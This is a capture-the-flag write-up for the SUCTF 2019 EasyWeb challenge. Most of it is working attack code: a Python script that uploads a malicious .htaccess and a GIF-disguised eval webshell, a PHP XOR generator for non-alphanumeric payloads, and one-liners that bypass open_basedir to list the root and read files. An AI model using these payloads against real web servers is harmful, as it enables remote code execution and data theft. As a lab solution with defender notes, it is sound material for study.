
[SUCTF 2019]EasyWeb

2022-06-09 02:02:00 I·CE

Knowledge points:

AddType application/x-httpd-php .ahhh — adding this directive makes files with the .ahhh extension be parsed as PHP scripts

GIF89a file-header spoofing

GIF89a12 — the extra "12" pads the 6-byte GIF89a header to 8 bytes, so the prefix is a whole number of base64 groups (4 characters each) and the appended base64 payload decodes correctly

Bypass open_basedir

Webshell without letters or digits (non-alphanumeric)

Python upload script


import requests
import base64

# Two multipart POSTs to the challenge instance, sent in order: first the
# .htaccess (declared as image/jpeg), then the "shell.ahhh" file whose body is
# the GIF89a12 prefix followed by the base64-encoded PHP. Both uploads go to
# the same URL, which already carries the XOR-encoded query from the writeup.
# Defender note: an extension allow-list at the upload and "AllowOverride None"
# in Apache would each break this chain on their own.
htaccess = b""" #define width 1337 #define height 1337 AddType application/x-httpd-php .ahhh php_value auto_append_file "php://filter/convert.base64-decode/resource=./shell.ahhh" """
shell = b"GIF89a12" + base64.b64encode(b"<?php eval($_REQUEST['cmd']);?>")
url = "http://1c512d61-43b5-41ae-9f74-4228d9af8caf.node4.buuoj.cn:81/?_=${%86%86%86%86^%d9%c1%c3%d2}{%86}();&%86=get_the_flag"

data = {"upload": "Submit"}
files = None
response = None
# Same form field and content type for both files; only name and body change.
for upload_name, payload in ((".htaccess", htaccess), ("shell.ahhh", shell)):
    files = {"file": (upload_name, payload, "image/jpeg")}
    response = requests.post(url=url, data=data, files=files)
    print(response.text)

XOR script:

function finds($string)
{
    // For each character of $string, print one pair of bytes from the
    // candidate table whose XOR equals that character, as "%hh^%hh".
    // Pairs are printed in the order they are discovered (grouped by XOR
    // value), not in string order, so the reader reorders them afterwards.
    // Returns 0 once strlen($string) matches have been printed; falls
    // through (null) if some character has no pair in the scanned range.
    $found = 0;
    // Same table as the literal list: selected ASCII punctuation, then every
    // byte from 128 to 255.
    $a = array_merge(
        [33, 35, 36, 37, 40, 41, 42, 43, 45, 47, 58, 59, 60, 62, 63, 64, 92, 93, 94, 123, 125],
        range(128, 255)
    );
    // Only entries from index 27 onward (bytes >= 134) are combined; the
    // printable punctuation at the start of the table is skipped.
    $candidates = array_slice($a, 27);
    $len = strlen($string);
    foreach ($candidates as $left) {
        foreach ($candidates as $right) {
            $xor = $left ^ $right;
            for ($pos = 0; $pos < $len; $pos++) {
                if (ord($string[$pos]) != $xor) {
                    continue;
                }
                echo $string[$pos], '<br/>', '%' . dechex($left) . '^%' . dechex($right), '<br/>';
                $found++;
                if ($found == $len) {
                    return 0;
                }
            }
        }
    }
}
// Demo call: prints one byte pair for each character of "phpinfo".
finds("phpinfo");

Bypassing open_basedir

// Three standalone one-liners (each is a complete snippet on its own). They
// share the same chdir()/ini_set() prefix and differ only in the final call:
// line 1 only resets open_basedir to "/", line 2 lists "/", line 3 reads the
// flag file named in the writeup.
// Defender note: as shown here, open_basedir does not confine PHP code that
// is already running; the effective controls are at the upload (extension
// allow-list) and in Apache (AllowOverride None), not this directive.
chdir('img');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');
chdir('img');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');var_dump(scandir("/"));
chdir('img');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');echo(file_get_contents('/THis_Is_tHe_F14g'));


版权声明
本文为[I·CE]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/159/202206081420200432.html